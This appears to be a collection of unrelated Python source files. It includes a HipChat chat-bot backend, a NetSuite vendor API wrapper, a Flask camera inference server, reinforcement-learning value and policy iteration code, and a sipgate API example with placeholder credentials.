V2_TOKEN_URL = "https://%(server)s/v2/room?auth_token=%(token)s&expand=items"
class HipChatRosterMixin(object):
@property
def people(self):
if not hasattr(self, "_people"):
self._people = self.load('will_hipchat_people', {})
return self._people
@property
def internal_roster(self):
logging.warn(
"mixin.internal_roster has been deprecated. Please use mixin.people instead. "
"internal_roster will be removed at the end of 2017"
)
return self.people
def get_user_by_full_name(self, name):
for jid, info in self.people.items():
if info["name"] == name:
return info
return None
def get_user_by_nick(self, nick):
for jid, info in self.people.items():
if info["nick"] == nick:
return info
return None
def get_user_by_jid(self, jid):
if jid in self.people:
return self.people[jid]
return None
def get_user_from_message(self, message):
if message["type"] == "groupchat":
if "xmpp_jid" in message:
user = self.get_user_by_jid(message["xmpp_jid"])
if user:
return user
elif "from" in message:
full_name = message["from"].split("/")[1]
user = self.get_user_by_full_name(full_name)
if user:
return user
if "mucnick" in message:
return self.get_user_by_full_name(message["mucnick"])
elif message['type'] in ('chat', 'normal'):
jid = ("%s" % message["from"]).split("@")[0].split("_")[1]
return self.get_user_by_jid(jid)
else:
return None
def message_is_from_admin(self, message):
nick = self.get_user_from_message(message)['nick']
return is_admin(nick)
def message_is_allowed(self, message, acl):
nick = self.get_user_from_message(message)['nick']
return is_acl_allowed(nick, acl)
def get_user_by_hipchat_id(self, id):
for jid, info in self.people.items():
if info["hipchat_id"] == id:
return info
return None
class HipChatRoom(Bunch):
@property
def id(self):
if 'room_id' in self:
# Using API v1
return self['room_id']
elif 'id' in self:
# Using API v2
return self['id']
else:
raise TypeError('Room ID not found')
@property
def history(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get("https://{1}/v2/room/{0}/history".format(str(self.id),
settings.HIPCHAT_SERVER),
params=payload, **settings.REQUESTS_OPTIONS)
data = json.loads(response.text)['items']
for item in data:
item['date'] = datetime.strptime(item['date'][:-13], "%Y-%m-%dT%H:%M:%S")
return data
@property
def participants(self):
payload = {"auth_token": settings.HIPCHAT_V2_TOKEN}
response = requests.get(
"https://{1}/v2/room/{0}/participant".format(
str(self.id),
settings.HIPCHAT_SERVER
),
params=payload,
**settings.REQUESTS_OPTIONS
).json()
data = response['items']
while 'next' in response['links']:
response = requests.get(response['links']['next'],
params=payload, **settings.REQUESTS_OPTIONS).json()
data.extend(response['items'])
return data
class HipChatRoomMixin(object):
def update_available_rooms(self, q=None):
self._available_rooms = {}
# Use v1 token to grab a full room list if we can (good to avoid rate limiting)
if hasattr(settings, "V1_TOKEN"):
url = V1_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V1_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if r.status_code == requests.codes.unauthorized:
raise Exception("V1_TOKEN authentication failed with HipChat")
for room in r.json()["rooms"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id.
room["id"] = room["room_id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
# Otherwise, grab 'em one-by-one via the v2 api.
else:
params = {}
params['start-index'] = 0
max_results = params['max-results'] = 1000
url = V2_TOKEN_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN}
while True:
resp = requests.get(url, params=params,
**settings.REQUESTS_OPTIONS)
if resp.status_code == requests.codes.unauthorized:
raise Exception("V2_TOKEN authentication failed with HipChat")
rooms = resp.json()
for room in rooms["items"]:
# Some integrations expect a particular name for the ID field.
# Better to use room.id
room["room_id"] = room["id"]
self._available_rooms[room["name"]] = HipChatRoom(**room)
logging.info('Got %d rooms', len(rooms['items']))
if len(rooms['items']) == max_results:
params['start-index'] += max_results
else:
break
self.save("hipchat_rooms", self._available_rooms)
if q:
q.put(self._available_rooms)
@property
def available_rooms(self):
if not hasattr(self, "_available_rooms"):
self._available_rooms = self.load('hipchat_rooms', None)
if not self._available_rooms:
self.update_available_rooms()
return self._available_rooms
def get_room_by_jid(self, jid):
for room in self.available_rooms.values():
if "xmpp_jid" in room and room["xmpp_jid"] == jid:
return room
return None
def get_room_from_message(self, message):
return self.get_room_from_name_or_id(message.data.channel.name)
def get_room_from_name_or_id(self, name_or_id):
for name, room in self.available_rooms.items():
if name_or_id.lower() == name.lower():
return room
if "xmpp_jid" in room and name_or_id == room["xmpp_jid"]:
return room
if "room_id" in room and name_or_id == room["room_id"]:
return room
return None
class HipChatXMPPClient(ClientXMPP, HipChatRosterMixin, HipChatRoomMixin, StorageMixin, PubSubMixin):
def start_xmpp_client(self, xmpp_bridge_queue=None, backend_name=""):
logger = logging.getLogger(__name__)
if not xmpp_bridge_queue:
logger.error("Missing required bridge queue")
self.xmpp_bridge_queue = xmpp_bridge_queue
self.backend_name = backend_name
ClientXMPP.__init__(self, "%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
if settings.USE_PROXY:
self.use_proxy = True
self.proxy_config = {
'host': settings.PROXY_HOSTNAME,
'port': settings.PROXY_PORT,
'username': settings.PROXY_USERNAME,
'password': settings.PROXY_PASSWORD,
}
self.rooms = []
self.default_room = settings.HIPCHAT_DEFAULT_ROOM
my_user_url = "https://%(server)s/v2/user/%(user_id)s?auth_token=%(token)s" % {
"user_id": settings.HIPCHAT_USERNAME.split("@")[0].split("_")[1],
"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
}
r = requests.get(my_user_url, **settings.REQUESTS_OPTIONS)
resp = r.json()
if "email" in resp:
settings.HIPCHAT_EMAIL = resp["email"]
settings.HIPCHAT_HANDLE = resp["mention_name"]
settings.HIPCHAT_NAME = resp["name"]
else:
raise EnvironmentError(
"\n\nError getting user info from Hipchat. This is usually a problem with the\n"
"username or V2 token, but here's what I heard back from them: \n\n %s\n\n" % resp
)
self.available_rooms
if hasattr(settings, "HIPCHAT_ROOMS") and settings.HIPCHAT_ROOMS:
for r in settings.HIPCHAT_ROOMS:
if r != "":
if not hasattr(self, "default_room"):
self.default_room = r
try:
self.rooms.append(self.available_rooms[r])
except KeyError:
logger.error(
u'"{0}" is not an available room, ask'
' "@{1} what are the rooms?" for the full list.'
.format(r, settings.HIPCHAT_HANDLE))
else:
for name, r in self.available_rooms.items():
if not hasattr(self, "default_room"):
self.default_room = r
self.rooms.append(r)
self.nick = settings.HIPCHAT_HANDLE
self.handle = settings.HIPCHAT_HANDLE
self.mention_handle = "@%s" % settings.HIPCHAT_HANDLE
self.whitespace_keepalive = True
self.whitespace_keepalive_interval = 30
if settings.ALLOW_INSECURE_HIPCHAT_SERVER is True:
self.add_event_handler('ssl_invalid_cert', lambda cert: True)
self.add_event_handler("roster_update", self.join_rooms)
self.add_event_handler("session_start", self.session_start)
self.add_event_handler("message", self.message_recieved)
self.add_event_handler("groupchat_message", self.room_message)
self.add_event_handler("groupchat_invite", self.room_invite)
self.add_event_handler("error", self.handle_errors)
self.add_event_handler("presence_error", self.handle_errors)
self.register_plugin('xep_0045') # MUC
def session_start(self, event):
self.send_presence()
try:
self.get_roster()
except IqError as err:
logging.error('There was an error getting the roster')
logging.error(err.iq['error']['condition'])
self.disconnect()
except IqTimeout:
logging.error('Server is taking too long to respond. Disconnecting.')
self.disconnect()
def join_rooms(self, event):
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def handle_errors(self, event):
print("got error event")
print(event)
def room_invite(self, event):
logging.info("Invite recieved for %s" % event)
for r in self.rooms:
if "xmpp_jid" in r:
self.plugin['xep_0045'].joinMUC(r["xmpp_jid"], settings.HIPCHAT_NAME, wait=True)
def update_will_roster_and_rooms(self):
people = self.load('will_hipchat_people', {})
# Loop through the connected rooms (self.roster comes from ClientXMPP)
for roster_id in self.roster:
cur_roster = self.roster[roster_id]
# Loop through the users in a given room
for user_id in cur_roster:
user_data = cur_roster[user_id]
if user_data["name"] != "":
# If we don't have this user in the people, add them.
if not user_id in people:
people[user_id] = Person()
hipchat_id = user_id.split("@")[0].split("_")[1]
# Update their info
people[user_id].update({
"name": user_data["name"],
"jid": user_id,
"hipchat_id": hipchat_id,
})
# If we don't have a nick yet, pull it and mention_name off the master user list.
if not hasattr(people[user_id], "nick") and hipchat_id in self.people:
user_data = self.get_user_list[hipchat_id]
people[user_id].nick = user_data["mention_name"]
people[user_id].mention_name = user_data["mention_name"]
# If it's me, save that info!
if people[user_id].get("name", "") == self.nick:
self.me = people[user_id]
self.save("will_hipchat_people", people)
self.update_available_rooms()
def room_message(self, msg):
self._send_to_backend(msg)
def message_recieved(self, msg):
if msg['type'] in ('chat', 'normal'):
self._send_to_backend(msg)
def real_sender_jid(self, msg):
# There's a bug in sleekXMPP where it doesn't set the "from_jid" properly.
# Thus, this hideous hack.
msg_str = "%s" % msg
start = 'from_jid="'
start_pos = msg_str.find(start)
if start_pos != -1:
cut_start = start_pos + len(start)
return msg_str[cut_start:msg_str.find('"', cut_start)]
return msg["from"]
def _send_to_backend(self, msg):
stripped_msg = Bunch()
# TODO: Find a faster way to do this - this is crazy.
for k, v in msg.__dict__.items():
try:
pickle.dumps(v)
stripped_msg[k] = v
except:
pass
for k in msg.xml.keys():
try:
# print(k)
# print(msg.xml.get(k))
pickle.dumps(msg.xml.get(k))
stripped_msg[k] = msg.xml.get(k)
except:
# print("failed to parse %s" % k)
pass
stripped_msg.xmpp_jid = msg.getMucroom()
stripped_msg.body = msg["body"]
self.xmpp_bridge_queue.put(stripped_msg)
class HipChatBackend(IOBackend, HipChatRosterMixin, HipChatRoomMixin, StorageMixin):
friendly_name = "HipChat"
internal_name = "will.backends.io_adapters.hipchat"
required_settings = [
{
"name": "HIPCHAT_USERNAME",
"obtain_at": """1. Go to hipchat, and create a new user for will.
2. Log into will, and go to Account settings>XMPP/Jabber Info.
3. On that page, the 'Jabber ID' is the value you want to use.""",
},
{
"name": "HIPCHAT_PASSWORD",
"obtain_at": (
"1. Go to hipchat, and create a new user for will. "
"Note that password - this is the value you want. "
"It's used for signing in via XMPP."
),
},
{
"name": "HIPCHAT_V2_TOKEN",
"obtain_at": """1. Log into hipchat using will's user.
2. Go to https://your-org.hipchat.com/account/api
3. Create a token.
4. Copy the value - this is the HIPCHAT_V2_TOKEN.""",
}
]
def send_direct_message(self, user_id, message_body, html=False, card=None, notify=False, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_direct_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/private_message_user
url = PRIVATE_MESSAGE_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_direct_message: \n%s" % traceback.format_exc())
def send_room_message(self, room_id, message_body, html=False, color="green", notify=False, card=None, **kwargs):
if kwargs:
logging.warn("Unknown keyword args for send_room_message: %s" % kwargs)
format = "text"
if html:
format = "html"
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_NOTIFICATION_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"message": message_body,
"message_format": format,
"color": color,
"notify": notify,
"card": card,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
r = requests.post(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
r.raise_for_status()
except:
logging.critical("Error in send_room_message: \n%s" % traceback.format_exc())
def set_room_topic(self, room_id, topic):
try:
# https://www.hipchat.com/docs/apiv2/method/send_room_notification
url = ROOM_TOPIC_URL % {"server": settings.HIPCHAT_SERVER,
"room_id": room_id,
"token": settings.HIPCHAT_V2_TOKEN}
data = {
"topic": topic,
}
headers = {'Content-type': 'application/json', 'Accept': 'text/plain'}
requests.put(url, headers=headers, data=json.dumps(data), **settings.REQUESTS_OPTIONS)
except:
logging.critical("Error in set_room_topic: \n%s" % traceback.format_exc())
def get_room_from_message(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
return False
else:
# We're in a public room
return send_source.channel.id
else:
# Came from webhook/etc
if "room" in kwargs:
return kwargs["room"],
else:
return self.get_room_from_name_or_id(settings.HIPCHAT_DEFAULT_ROOM)["room_id"]
return False
def get_hipchat_user(self, user_id, q=None):
url = USER_DETAILS_URL % {"server": settings.HIPCHAT_SERVER,
"user_id": user_id,
"token": settings.HIPCHAT_V2_TOKEN}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
if q:
q.put(r.json())
else:
return r.json()
@property
def people(self):
if not hasattr(self, "_people"):
full_roster = {}
# Grab the first roster page, and populate full_roster
url = ALL_USERS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for user in r.json()['items']:
full_roster["%s" % (user['id'],)] = Person(
id=user["id"],
handle=user["mention_name"],
mention_handle="@%s" % user["mention_name"],
source=clean_for_pickling(user),
name=user["name"],
)
self._people = full_roster
for k, u in full_roster.items():
if u.handle == settings.HIPCHAT_HANDLE:
self.me = u
return self._people
@property
def channels(self):
if not hasattr(self, "_channels"):
all_rooms = {}
# Grab the first roster page, and populate all_rooms
url = ALL_ROOMS_URL % {"server": settings.HIPCHAT_SERVER,
"token": settings.HIPCHAT_V2_TOKEN,
"start_index": 0,
"max_results": 1000}
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
# print(room)
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={},
)
# Keep going through the next pages until we're out of pages.
while 'next' in r.json()['links']:
url = "%s&auth_token=%s" % (r.json()['links']['next'], settings.HIPCHAT_V2_TOKEN)
r = requests.get(url, **settings.REQUESTS_OPTIONS)
for room in r.json()['items']:
all_rooms["%s" % (room['xmpp_jid'],)] = Channel(
id=room["id"],
name=room["name"],
source=clean_for_pickling(room),
members={}
)
self._channels = all_rooms
return self._channels
def normalize_incoming_event(self, event):
logging.debug("hipchat: normalize_incoming_event - %s" % event)
if event["type"] in ("chat", "normal", "groupchat") and ("from_jid" in event or "from" in event):
sender = self.get_user_from_message(event)
interpolated_handle = "@%s" % self.me.handle
will_is_mentioned = False
will_said_it = False
channel = None
if "xmpp_jid" in event and event["xmpp_jid"]:
channel = clean_for_pickling(self.channels[event["xmpp_jid"]])
is_private_chat = False
else:
if event["type"] in ("chat", "normal"):
is_private_chat = True
is_direct = False
if is_private_chat or event["body"].startswith(interpolated_handle):
is_direct = True
if event["body"].startswith(interpolated_handle):
event["body"] = event["body"][len(interpolated_handle):].strip()
if interpolated_handle in event["body"]:
will_is_mentioned = True
if sender and self.me and sender.id == self.me.id:
will_said_it = True
m = Message(
content=event["body"],
is_direct=is_direct,
is_private_chat=is_private_chat,
is_group_chat=not is_private_chat,
backend=self.internal_name,
sender=sender,
channel=channel,
will_is_mentioned=will_is_mentioned,
will_said_it=will_said_it,
backend_supports_acl=True,
original_incoming_event=clean_for_pickling(event),
)
# print("normalized:")
# print(m.__dict__)
return m
else:
# print("Unknown event type")
# print(event)
return None
def handle_outgoing_event(self, event):
kwargs = {}
if hasattr(event, "kwargs"):
kwargs.update(event.kwargs)
room = None
passed_room = None
if "room" in kwargs:
passed_room = kwargs["room"]
if "channel" in kwargs:
passed_room = kwargs["channel"]
if passed_room:
if isinstance(passed_room, str):
# User passed in a room string
room = self.get_room_from_name_or_id(passed_room)
else:
# User found the internal HipChatRoom object and passed it.
room = passed_room
else:
# Default to the room we heard this message in.
room = self.get_room_from_message(event)
room_id = None
if room and hasattr(room, "id"):
room_id = room.id
else:
room_id = room
if event.type in ["say", "reply"]:
event.content = re.sub(r'>\s+<', '><', event.content)
if hasattr(event, "source_message") and event.source_message and not room:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
if send_source.is_private_chat:
# Private, 1-1 chats.
self.send_direct_message(send_source.sender.id, event.content, **kwargs)
return
# Otherwise trust room.
self.send_room_message(
room_id,
event.content,
**kwargs
)
elif event.type in ["topic_change", ]:
if room_id:
self.set_room_topic(room_id, event.content)
else:
if hasattr(event, "source_message") and event.source_message:
send_source = event.source_message
if hasattr(event.source_message, "data"):
send_source = event.source_message.data
self.send_direct_message(send_source.sender.id, "I can't set the topic of a one-to-one chat. Let's just talk.", **kwargs)
elif (
event.type == "message.no_response"
and event.data.is_direct
and event.data.will_said_it is False
):
if event.data.original_incoming_event.type == "groupchat":
self.send_room_message(
event.data.channel.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
else:
self.send_direct_message(
event.data.sender.id,
random.choice(UNSURE_REPLIES),
**kwargs
)
def __handle_bridge_queue(self):
while True:
try:
try:
input_event = self.xmpp_bridge_queue.get(timeout=settings.EVENT_LOOP_INTERVAL)
if input_event:
self.handle_incoming_event(input_event)
except Empty:
pass
except (KeyboardInterrupt, SystemExit):
pass
self.sleep_for_event_loop()
def bootstrap(self):
# Bootstrap must provide a way to to have:
# a) self.normalize_incoming_event fired, or incoming events put into self.incoming_queue
# b) any necessary threads running for a)
# c) self.me (Person) defined, with Will's info
# d) self.people (dict of People) defined, with everyone in an organization/backend
# e) self.channels (dict of Channels) defined, with all available channels/rooms.
# Note that Channel asks for members, a list of People.
# f) A way for self.handle, self.me, self.people, and self.channels to be kept accurate,
# with a maximum lag of 60 seconds.
self.client = HipChatXMPPClient("%s/bot" % settings.HIPCHAT_USERNAME, settings.HIPCHAT_PASSWORD)
self.xmpp_bridge_queue = Queue()
self.client.start_xmpp_client(
xmpp_bridge_queue=self.xmpp_bridge_queue,
backend_name=self.internal_name,
)
self.client.connect()
# Even though these are properties, they do some gets and self-fillings.
self.people
self.channels
self.bridge_thread = Process(target=self.__handle_bridge_queue)
self.bridge_thread.start()
self.xmpp_thread = Process(target=self.client.process, kwargs={"block": True})
self.xmpp_thread.start()
def terminate(self):
if hasattr(self, "xmpp_thread"):
self.xmpp_thread.terminate()
if hasattr(self, "bridge_thread"):
self.bridge_thread.terminate()
while (
(hasattr(self, "xmpp_thread") and self.xmpp_thread.is_alive())
or (hasattr(self, "bridge_thread") and self.bridge_thread.is_alive())
):
time.sleep(0.2)
|
115924
|
from collections import OrderedDict
from .base import ApiBase
import logging
logger = logging.getLogger(__name__)
class Vendors(ApiBase):
SIMPLE_FIELDS = [
'accountNumber',
'addressbookList',
'altEmail',
'altName',
'altPhone',
'balance',
'balancePrimary',
'bcn',
'billPay',
'comments',
'companyName',
'creditLimit',
'currencyList',
'customFieldList',
'dateCreated',
'defaultAddress',
'eligibleForCommission',
'email',
'emailPreference',
'emailTransactions',
'entityId',
'fax',
'faxTransactions',
'firstName',
'giveAccess',
'globalSubscriptionStatus',
'homePhone',
'internalId',
'is1099Eligible',
'isAccountant',
'isInactive',
'isJobResourceVend',
'isPerson',
'laborCost',
'lastModifiedDate',
'lastName',
'legalName',
'middleName',
'mobilePhone',
'openingBalance',
'openingBalanceDate',
'password',
'<PASSWORD>',
'phone',
'phoneticName',
'predConfidence',
'predictedDays',
'pricingScheduleList',
'printOnCheckAs',
'printTransactions',
'purchaseOrderAmount',
'purchaseOrderQuantity',
'purchaseOrderQuantityDiff',
'receiptAmount',
'receiptQuantity',
'receiptQuantityDiff',
'requirePwdChange',
'rolesList',
'salutation',
'sendEmail',
'subscriptionsList',
'taxIdNum',
'taxRegistrationList',
'title',
'unbilledOrders',
'unbilledOrdersPrimary',
'url',
'vatRegNumber',
'nullFieldList',
]
RECORD_REF_FIELDS = [
'category',
'customForm',
'defaultTaxReg',
'expenseAccount',
'image',
'incoterm',
'openingBalanceAccount',
'payablesAccount',
'taxItem',
'terms',
]
def __init__(self, ns_client):
ApiBase.__init__(self, ns_client=ns_client, type_name='Vendor')
def post(self, data) -> OrderedDict:
assert data['externalId'], 'missing external id'
vendor = self.ns_client.Vendor(externalId=data['externalId'])
vendor['currency'] = self.ns_client.RecordRef(**(data['currency']))
vendor['subsidiary'] = self.ns_client.RecordRef(**(data['subsidiary']))
vendor['representingSubsidiary'] = self.ns_client.RecordRef(**(data['representingSubsidiary']))
vendor['workCalendar'] = self.ns_client.RecordRef(**(data['workCalendar']))
self.build_simple_fields(self.SIMPLE_FIELDS, data, vendor)
self.build_record_ref_fields(self.RECORD_REF_FIELDS, data, vendor)
logger.debug('able to create vendor = %s', vendor)
res = self.ns_client.upsert(vendor)
return self._serialize(res)
|
115993
|
import cv2
import os, logging, time, json
import requests, base64
from flask import Flask, jsonify, request, Response
import numpy as np
# for HTTP/1.1 support
from werkzeug.serving import WSGIRequestHandler
app = Flask(__name__)
logging.basicConfig(format='%(asctime)s %(levelname)-10s %(message)s', datefmt="%Y-%m-%d-%H-%M-%S",
level=logging.INFO)
def main():
pass
def grab_image_from_stream():
repeat = 3
wait = 3
frame = None
for _ in range(repeat):
try:
video_capture = cv2.VideoCapture(args.camera)
video_capture.set(cv2.CAP_PROP_BUFFERSIZE, 1)
frame = video_capture.read()[1]
break
except:
# try to re-capture the stream
logging.info("Could not capture video. Recapturing and retrying...")
time.sleep(wait)
if frame is None:
logging.info("Failed to capture frame, sending blank image")
frame = np.zeros((300, 300, 3))
return frame
@app.route('/image/700')
def video_image():
frame = grab_image_from_stream()
_, jpeg = cv2.imencode('.jpg', frame)
response = Response(jpeg.tobytes(), headers={"content-length": len(jpeg)}, mimetype="image/jpeg")
return response
@app.route('/image/800')
def video_image_and_inference():
frame = grab_image_from_stream()
frame = cv2.resize(frame, (300, 300))
_, jpeg = cv2.imencode('.jpg', frame)
resp_img = jpeg.tobytes()
scoring_url = "http://grocerymodel:5001/score"
json_img = json.dumps({"img": frame.tolist()})
input_data = json_img
headers = {'Content-Type':'application/json'}
resp = requests.post(scoring_url, input_data, headers=headers)
logging.info(f'received response: {resp.status_code}')
resp_json = json.loads(resp.content)
resp_json["img"] = str(base64.b64encode(resp_img), "utf-8")
return jsonify(resp_json)
def start_app():
# set protocol to 1.1 so we keep the connection open
WSGIRequestHandler.protocol_version = "HTTP/1.1"
if args.fast:
logging.info("Running the `fast` version")
app.run(host="0.0.0.0", port=args.port)
else:
logging.info(f"Staring regular inventory cam. Port: {args.port}")
app.run(debug=False)
if __name__ == "__main__":
from cmdline import cmd_args
args = cmd_args.parse_camera_args()
if not args.fast:
app.config['SERVER_NAME'] = f'inventorycam:{args.port}'
if args.debug:
logging.info("Please attach a debugger to port 5678")
import ptvsd
ptvsd.enable_attach(('0.0.0.0', 5681))
ptvsd.wait_for_attach()
ptvsd.break_into_debugger()
start_app()
|
116005
|
from layers import Layer
import tensorflow as tf
class UniformNeighborSampler(Layer):
"""
Uniformly samples neighbors.
Assumes that adj lists are padded with random re-sampling
"""
def __init__(self, adj_info, **kwargs):
super(UniformNeighborSampler, self).__init__(**kwargs)
self.adj_info = adj_info
def _call(self, inputs):
ids, num_samples = inputs
adj_lists = tf.nn.embedding_lookup(self.adj_info, ids)
adj_lists = tf.transpose(tf.transpose(adj_lists))
adj_lists = tf.slice(adj_lists, [0,0], [-1, num_samples])
return adj_lists
|
116089
|
from com.huawei.iotplatform.client.dto.ServiceCommand import ServiceCommand
from com.huawei.iotplatform.client.dto.ServiceProperty import ServiceProperty
class ServiceCapabilityDTO(object):
commands = ServiceCommand()
properties = ServiceProperty()
def __init__(self):
self.serviceId = None
self.serviceType = None
self.option = None
self.description = None
def getServiceId(self):
return self.serviceId
def setServiceId(self, serviceId):
self.serviceId = serviceId
def getServiceType(self):
return self.serviceType
def setServiceType(self, serviceType):
self.serviceType = serviceType
def getOption(self):
return self.option
def setOption(self, option):
self.option = option
def getDescription(self):
return self.description
def setDescription(self, description):
self.description = description
def getCommands(self):
return self.commands
def setCommands(self, commands):
self.commands = commands
def getProperties(self):
return self.properties
def setProperties(self, properties):
self.properties = properties
|
116126
|
import numpy as np
# global stopping criteria
EPS = 0.001
def value_iteration(model, maxiter=100):
"""
Solves the supplied environment with value iteration.
Parameters
----------
model : python object
Holds information about the environment to solve
such as the reward structure and the transition dynamics.
maxiter : int
The maximum number of iterations to perform.
Return
------
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
pi : numpy array of shape (N, 1)
Optimal policy of the environment.
"""
# initialize the value function and policy
pi = np.ones((model.num_states, 1))
val_ = np.zeros((model.num_states, 1))
for i in range(maxiter):
# initialize delta
delta = 0
# perform Bellman update for each state
for state in range(model.num_states):
# store old value
tmp = val_[state].copy()
# compute the value function
val_[state] = np.max( np.sum((model.R[state] + model.gamma * val_) * model.P[state,:,:], 0) )
# find maximum change in value
delta = np.max( (delta, np.abs(tmp - val_[state])) )
# stopping criteria
if delta <= EPS * (1 - model.gamma) / model.gamma:
print("Value iteration converged after %d iterations." % i)
break
# compute the policy
for state in range(model.num_states):
pi[state] = np.argmax(np.sum(val_ * model.P[state,:,:],0))
return val_, pi
def policy_iteration(model, maxiter):
"""
Solves the supplied environment with policy iteration.
Parameters
----------
model : python object
Holds information about the environment to solve
such as the reward structure and the transition dynamics.
maxiter : int
The maximum number of iterations to perform.
Return
------
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
pi : numpy array of shape (N, 1)
Optimal policy of the environment.
"""
# initialize the value function and policy
pi = np.ones((model.num_states, 1))
val_ = np.zeros((model.num_states, 1))
for i in range(maxiter):
# Stopping criteria
stable_policy = True
# Policy evaluation
val_ = policy_evaluation(model, val_, pi)
for state in range(model.num_states):
# do policy improvement
action = np.argmax( np.sum( (model.R[state] + model.gamma * val_) * model.P[state,:,:], 0) )
# check if policy has been updated
if action != pi[state]:
# store new action
pi[state] = action
# update stopping criteria
stable_policy = False
# check if stopping criteria satisfied
if stable_policy:
print("Policy iteration converged after %d iterations." % i)
break
return val_, pi
def policy_evaluation(model, val_, policy):
"""
Evaluates a given policy.
Parameters
----------
model : python object
Holds information about the environment to solve
such as the reward structure and the transition dynamics.
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
policy : numpy array of shape (N, 1)
Optimal policy of the environment.
Return
------
val_ : numpy array of shape (N, 1)
Value function of the environment where N is the number
of states in the environment.
"""
loop = True
while loop:
# initialize delta
delta = 0
for state in range(model.num_states):
# store old value
tmp = val_[state].copy()
# compute the value function
val_[state] = np.sum( (model.R[state] + model.gamma * val_) * model.P[state,:,int(policy[state])].reshape(-1,1))
# find maximum change in value
delta = np.max( (delta, np.abs(tmp - val_[state])) )
# stopping criteria
if delta <= EPS * (1 - model.gamma) / model.gamma:
loop = False
return val_
|
116133
|
import base64
import requests
def personal_access_token():
base_url = 'https://api.sipgate.com/v2'
token_id = 'YOUR_SIPGATE_TOKEN_ID'
token = '<PASSWORD>'
credentials = (token_id + ':' + token).encode('utf-8')
base64_encoded_credentials = base64.b64encode(credentials).decode('utf-8')
headers = {
'Authorization': 'Basic ' + base64_encoded_credentials
}
response = requests.get(base_url + '/account', headers=headers)
print('Status:', response.status_code)
print('Body:', response.content.decode("utf-8"))
if __name__ == "__main__":
personal_access_token()
|
116159
|
import json
import pathlib
from pprint import pprint
# Save it to a JSON file.
with open(file='configs/packages.jsonc', mode='r') as pack_json:
file_paths = json.load(fp=pack_json)
all_directories = []
all_folders = []
for file_path in file_paths:
folder_path = pathlib.WindowsPath(file_path)
all_directories = all_directories + list(folder_path.iterdir())
for directory in all_directories:
folder_path = pathlib.WindowsPath(directory)
if folder_path.is_dir():
for folder in list(folder_path.iterdir()):
filter_list = [
'resources and note', 'config', 'configs',
'docs', 'data', 'indicators', 'sample-responses',
'dist', 'build', '.vscode', 'LICENSE', '.gitignore',
'.pypirc', '.git', '.github', 'tests', 'README.md',
'resources', 'samples', 'setup.py'
]
if folder.parts[-1] not in filter_list and not folder.is_file() and '.egg-info' not in folder.parts[-1]:
print(folder.parts)
all_folders.append(folder)
class WindowsPathEncoder(json.JSONEncoder):
def default(self, obj):
# If we have a Windows Path Object, convert it to a string.
if isinstance(obj, pathlib.WindowsPath):
return obj.as_posix()
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
all_folders = list(set(all_folders))
# Save it to a JSON file.
with open(file='configs/packages_files.jsonc', mode='w+') as pack_json:
json.dump(
obj=all_folders,
fp=pack_json,
indent=2,
cls=WindowsPathEncoder
)
|
116166
|
import socket
from pickle import loads, dumps
class Pipe:
def __init__(self, server: str, port: int) -> None:
self.server = server
self.port = port
self.tcp = socket.socket()
self.udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.connected = False
self.username = None
self.udp_password = None
self.game_port = None
def connect(self) -> bool:
try:
self.tcp.connect((self.server, self.port))
self.connected = True
return True
except (ConnectionResetError, ConnectionRefusedError):
return False
def login(self) -> bool:
if not self.connected:
success = self.connect()
if not success:
return False
self.tcp.send(f"play request,,1234509876".encode())
response = self.tcp.recv(100)
if response == b"Pended":
return True
else:
return False
def await_response(self) -> list:
try:
data = self.tcp.recv(1000)
data = data.decode().split("||")
full_data = []
